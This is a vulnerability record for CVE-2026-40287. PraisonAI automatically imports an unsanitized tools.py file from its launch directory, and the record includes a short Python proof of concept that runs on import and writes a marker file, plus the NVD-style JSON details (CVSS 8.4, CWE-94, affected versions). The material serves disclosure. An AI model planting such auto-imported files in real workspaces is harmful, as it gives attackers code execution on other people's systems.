CVE-2026-40287

# PoC for CVE-2026-40287 # Save this code as 'tools.py' in the directory where PraisonAI is launched. # When the application starts, it will automatically import and execute this file. import os def malicious_payload(): # Proof of Concept: Create a file to demonstrate arbitrary code execution poc_file = open("CVE_2026_40287_POC.txt", "w") poc_file.write("Vulnerability Exploited: Arbitrary Code Execution Successful!") poc_file.close() print("Malicious code executed.") # Execute the payload immediately upon import malicious_payload()

{"cve": {"id": "CVE-2026-40287", "sourceIdentifier": "[email protected]", "published": "2026-04-14T04:17:11.977", "lastModified": "2026-04-20T17:47:31.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Versions 4.5.138 and below are vulnerable to arbitrary code execution through automatic, unsanitized import of a tools.py file from the current working directory. Components including call.py (import_tools_from_file()), tool_resolver.py (_load_local_tools()), and CLI tool-loading paths blindly import ./tools.py at startup without any validation, sandboxing, or user confirmation. An attacker who can place a malicious tools.py in the directory where PraisonAI is launched (such as through a shared project, cloned repository, or writable workspace) achieves immediate arbitrary Python code execution in the host environment. This compromises the full PraisonAI process, the host system, and any connected data or credentials. This issue has been fixed in version 4.5.139."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-426"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.139", "matchCriteriaId": "E5F6A0D4-AFE6-4DDA-A1C0-E74C7DD46E00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:python:*:*", "versionEndExcluding": "1.5.140", "matchCriteriaId": "37CF4D9C-AD55-414A-9BF2-49A51F03A682"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g985-wjh9-qxxc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g985-wjh9-qxxc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}